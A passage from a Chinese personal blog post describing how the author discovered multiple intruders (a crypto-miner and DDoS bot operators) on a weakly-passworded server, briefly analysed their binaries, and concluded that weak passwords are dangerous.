<p>并且通过 user id 搜到一个类似的攻击记录  <a href="http://uglyduck.vajn.icu/honeypot/" target="_blank" rel="external">http://uglyduck.vajn.icu/honeypot/</a></p>
<p>基本上可以推断，他只是进来想用我的服务器为他免费挖矿。基本上现在可以确定，入侵者应该不止一波了，而是很多人怀揣着自己的梦想向我的服务器走来。有意思的是他们清除历史痕迹的风格迥异：有的非常耐心细致地帮我一个文件一个文件地清除操作历史，有的则是脾气很不好地直接把系统存放日志的目录一锅全删了。联想到成功登陆后试密码的动作却依然在进行，基本可以确定有多伙人在搞我。把最近登陆进来的人分为几批：</p>
<ul>
<li><p>jdk党，一心一意试图在我电脑上下载自己java-sdk。运行后自销毁。很神秘。天天来。</p>
</li>
<li><p>udev党，每小时执行定时任务，运行的二进制 udev 有待进一步分析。来过一次。</p>
</li>
<li><p>矿工党，试图拿我的机器挖矿，并暴力修改密码和删除改密机制来独占我的机器。今天刚来。</p>
</li>
<li><p>DDos党，可能是上面出现过的人，也可能是另一伙我没抓到的神秘人。</p>
</li>
</ul>
<p>了解这个状况后，我陷入了深深的担忧：矿工党修改密码后岂不是其它黑客进不来了？由于矿工党单纯的意图我已经摸清了，我对他兴趣不大，所以决定撕破脸皮，直接把密码又改了回去，向其他入侵者重新开放怀抱。今天差不多这样，先抹掉自己的痕迹静观其变。</p>
<p>为了了解 udev 党的意图，我把可疑的 udev 文件交给了真正的黑客、0 day 漏洞挖掘机周宇做逆向分析（本来寻求他帮助是想让他帮我反击打击黑产的，结果他现在专心挖洞不搞渗透了。大神风范！）宇神告诉我 udev 就是我一直在找的 DDoS 发起者。同时他授人以渔地推荐给了我很多好用的逆向工具，让我直接从用 gdb 一点点 disassemble 一路升天到一键 decompile。然后自己顺利的地分析了 jdk 小子的两个可疑文件：</p>
<p><img src="/img/image-20200102191830507.png" alt="image-20200102191830507" style="zoom:150%;"></p>
<p>jdk8 和 9 应该是同样的目的，猜测入侵者是为了同时兼容 SystemV 和 linux 而做了两个版本。因为 jdk8带有符号信息，尝试反编译，最终找到核心攻击代码：</p>
<p><img src="/img/image-20200102191424119.png?60" alt=""></p>
<p>竟然也是在 DDoS!</p>
<p>完结撒花！</p>
<p>通过这件事，我学到一个朴素的知识：弱口令是真的危险。入侵者有时候目的还是很邪恶的，不只是强行跟你共享服务器，可能会企图完全霸占。不能抱着“应该没有人会盯上我这台小破机器吧”的侥幸态度，一定要认真设置密码，哪怕只是试验机。</p>

      
    </div>
    
  </div>
  
    
<nav id="article-nav">
  
  
    <a href="/2019/07/23/tabnine-experience/" id="article-nav-older" class="article-nav-link-wrap">
      <div class="article-nav-title">tabnine试用体验</div>
      <strong class="article-nav-caption">></strong>
    </a>
  
</nav>

  
</article>


<div class="share">
	<!-- JiaThis Button BEGIN -->
	<div class="jiathis_style">
		<span class="jiathis_txt">分享到：</span>
		<a class="jiathis_button_tsina"></a>
		<a class="jiathis_button_cqq"></a>
		<a class="jiathis_button_douban"></a>
		<a class="jiathis_button_weixin"></a>
		<a class="jiathis_button_tumblr"></a>
		<a href="http://www.jiathis.com/share" class="jiathis jiathis_txt jtico jtico_jiathis" target="_blank"></a>
	</div>
	<script type="text/javascript" src="http://v3.jiathis.com/code/jia.js?uid=1405949716054953" charset="utf-8"></script>
	<!-- JiaThis Button END -->
</div>





</div>
      <footer id="footer">
  <div class="outer">
    <div id="footer-info">
    	<div class="footer-left">
    		&copy; 2020 Zhengyu Zhang
    	</div>
      	<div class="footer-right">
      		<a href="http://hexo.io/" target="_blank">Hexo</a>  Theme <a href="https://github.com/litten/hexo-theme-yilia" target="_blank">Yilia</a> by Litten
      	</div>
    </div>
  </div>
</footer>

    </div>
    
  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css" type="text/css">


<script>
	var yiliaConfig = {
		fancybox: true,
		mathjax: true,
		animate: true,
		isHome: false,
		isPost: true,
		isArchive: false,
		isTag: false,
		isCategory: false,
		open_in_new: false
	}
</script>
<script src="http://7.url.cn/edu/jslib/comb/require-2.1.6,jquery-1.9.1.min.js" type="text/javascript"></script>
<script src="/js/main.js" type="text/javascript"></script>






<script type="text/x-mathjax-config">
MathJax.Hub.Config({
    tex2jax: {
        inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
        processEscapes: true,
        skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
    }
});

MathJax.Hub.Queue(function() {
    var all = MathJax.Hub.getAllJax(), i;
    for(i=0; i < all.length; i += 1) {
        all[i].SourceElement().parentNode.className += ' has-jax';                 
    }       
});
</script>

<script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS-MML_HTMLorMML">
</script>


  </div>
</body>
</html>
